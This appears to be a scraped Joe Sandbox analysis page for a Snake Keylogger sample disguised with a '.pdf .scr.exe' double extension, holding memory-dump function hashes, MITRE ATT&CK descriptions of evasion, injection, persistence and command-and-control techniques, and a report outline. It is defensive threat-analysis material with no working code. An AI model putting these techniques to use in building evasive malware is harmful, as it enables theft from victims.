Source File: 00000002.00000002.2550043207.00007FF7C8170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c8170000_InstallUtil.jbxd

Similarity

API ID:
String ID: @[#:
API String ID: 0-2719803555
Opcode ID: bf799503f55cd103e4578a882c316e18efddf8e76d5ba3eb7935b076cdd2d7aa
Instruction ID: bb3977d3da0c488c918cd3043dbf0838f441580144986197367f619a95268da8
Opcode Fuzzy Hash: bf799503f55cd103e4578a882c316e18efddf8e76d5ba3eb7935b076cdd2d7aa
Instruction Fuzzy Hash: C0511471D0D68D4FE751AB68A8555E8FBE0EF4A724B8901FEC089CB093DE182847CB64

Function 00007FF7C81721B9 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

x7#:, xrefs: 00007FF7C817221F

Memory Dump Source

Source File: 00000002.00000002.2550043207.00007FF7C8170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c8170000_InstallUtil.jbxd

Similarity

API ID:
String ID: x7#:
API String ID: 0-3595438761
Opcode ID: 39522ca17dc0ceec33203a6edcba168ce7c1fbb6afc59d3e2fce85f037b6416b
Instruction ID: cea0b8d3ce5bac4ed2bf6787f234c29822274aebf1a5bbbe860c8636b55571f6
Opcode Fuzzy Hash: 39522ca17dc0ceec33203a6edcba168ce7c1fbb6afc59d3e2fce85f037b6416b
Instruction Fuzzy Hash: F421C2B0D0C64C9FDF41EBA8C8556ECBBF0FF59311F4004AAD408E3192DB28A845C710

Function 00007FF7C8170EF4 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550043207.00007FF7C8170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c8170000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b515395667a482166f180bd38bc8180345ea1a1db235e1a6d045a03f77a02c
Instruction ID: 17980c824df062cee6396ac56873402f05578035bc2369423f9e773aa26010b3
Opcode Fuzzy Hash: b2b515395667a482166f180bd38bc8180345ea1a1db235e1a6d045a03f77a02c
Instruction Fuzzy Hash: 68E0ED70909B989FDB90EB28C45CB99BBF1EF5A300F0444DA844DD3151DB349985CF01

Non-executed Functions

Function 00007FF7C8171619 Relevance: 7.6, Strings: 6, Instructions: 130COMMON

Download Yara Rule

Strings

(M_H, xrefs: 00007FF7C817163D
H[#:, xrefs: 00007FF7C8171758
H[#:, xrefs: 00007FF7C817177F
H[#:, xrefs: 00007FF7C817171D
p7#:, xrefs: 00007FF7C8171642
h7#:, xrefs: 00007FF7C8171626

Memory Dump Source

Source File: 00000002.00000002.2550043207.00007FF7C8170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C8170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c8170000_InstallUtil.jbxd

Similarity

API ID:
String ID: (M_H$H[#:$H[#:$H[#:$h7#:$p7#:
API String ID: 0-1092570412
Opcode ID: 393031516ed58fa50f883a71b9a1d55eb43318bf2be9c0f5e4618fefa2c13733
Instruction ID: 727d46ba1bc7767499729017a1cc4f8e618f1d315276d2c1647c1e494643c395
Opcode Fuzzy Hash: 393031516ed58fa50f883a71b9a1d55eb43318bf2be9c0f5e4618fefa2c13733
Instruction Fuzzy Hash: B64125B1A0D9C95FC716AB7894795F9FFA1FF5B220B0806FED04997493CB282852C741

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zam#U00f3wienie 12832025_pdf .scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
zam#U00f3wienie 12832025_pdf .scr.exe